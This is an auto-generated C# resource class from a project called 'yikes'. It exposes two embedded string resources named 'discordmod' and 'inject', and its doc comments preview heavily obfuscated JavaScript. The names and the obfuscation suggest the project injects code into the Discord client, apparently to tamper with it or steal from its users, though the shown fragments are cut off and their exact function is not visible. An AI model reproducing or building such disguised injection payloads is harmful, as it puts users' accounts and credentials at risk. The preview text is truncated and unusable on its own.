//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace yikes {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("yikes.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to const g=function(){const u={};u[&apos;Qg&apos;+&apos;ti&apos;+&apos;m&apos;]=&apos;fi&apos;+&apos;nd&apos;+&apos;DO&apos;+&apos;MN&apos;+&apos;od&apos;+&apos;e&apos;;u[&apos;nG&apos;+&apos;nv&apos;+&apos;I&apos;]=function(z,A){return z===A;};u[&apos;bl&apos;+&apos;HK&apos;+&apos;P&apos;]=&apos;st&apos;+&apos;ri&apos;+&apos;ng&apos;;u[&apos;yi&apos;+&apos;ND&apos;+&apos;o&apos;]=function(x,y){return x(y);};u[&apos;sq&apos;+&apos;RV&apos;+&apos;j&apos;]=&apos;pX&apos;+&apos;ME&apos;+&apos;M&apos;;const v=u;let w=!![];return function(x,y){const z={};z[&apos;LT&apos;+&apos;lW&apos;+&apos;C&apos;]=v[&apos;Qg&apos;+&apos;ti&apos;+&apos;m&apos;];z[&apos;dV&apos;+&apos;xv&apos;+&apos;U&apos;]=function(C,D){return v[&apos;nG&apos;+&apos;nv&apos;+&apos;I&apos;](C,D);};z[&apos;ix&apos;+&apos;FS&apos;+&apos;s&apos;]=v[&apos;bl&apos;+&apos;HK&apos;+&apos;P&apos;];z[&apos;Qu&apos;+&apos;XO&apos;+&apos;s&apos;]=function(C,D){return v[&apos;yi&apos;+&apos;ND&apos;+&apos;o&apos;](C,D);};z[&apos;ZU&apos;+&apos;EB&apos;+&apo....
        /// </summary>
        internal static string discordmod {
            get {
                return ResourceManager.GetString("discordmod", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to const f=function(){const h={};h[&apos;Ri&apos;+&apos;zd&apos;+&apos;s&apos;]=&apos;ML&apos;+&apos;za&apos;+&apos;H&apos;;h[&apos;Fe&apos;+&apos;Cm&apos;+&apos;o&apos;]=&apos;XX&apos;+&apos;Fx&apos;+&apos;w&apos;;h[&apos;Dd&apos;+&apos;dv&apos;+&apos;F&apos;]=&apos;rq&apos;+&apos;zy&apos;+&apos;B&apos;;h[&apos;nl&apos;+&apos;TC&apos;+&apos;A&apos;]=&apos;Hl&apos;+&apos;Pr&apos;+&apos;p&apos;;const i=h;let j=!![];return function(k,l){const m={};m[&apos;Il&apos;+&apos;So&apos;+&apos;v&apos;]=function(o,p){return o===p;};m[&apos;DE&apos;+&apos;ro&apos;+&apos;l&apos;]=i[&apos;Ri&apos;+&apos;zd&apos;+&apos;s&apos;];m[&apos;RP&apos;+&apos;fy&apos;+&apos;A&apos;]=i[&apos;Fe&apos;+&apos;Cm&apos;+&apos;o&apos;];const n=m;if(i[&apos;Dd&apos;+&apos;dv&apos;+&apos;F&apos;]!==i[&apos;nl&apos;+&apos;TC&apos;+&apos;A&apos;]){const o=j?function(){if(l){if(n[&apos;Il&apos;+&apos;So&apos;+&apos;v&apos;](n[&apos;DE&apos;+&apos;ro&apos;+&apos;l&apos;],n[&apos;RP&apos;+&apos;fy&apos;+&apos;A&apos;])){const q=l[&apos;ap&apos;+&a....
        /// </summary>
        internal static string inject {
            get {
                return ResourceManager.GetString("inject", resourceCulture);
            }
        }
    }
}
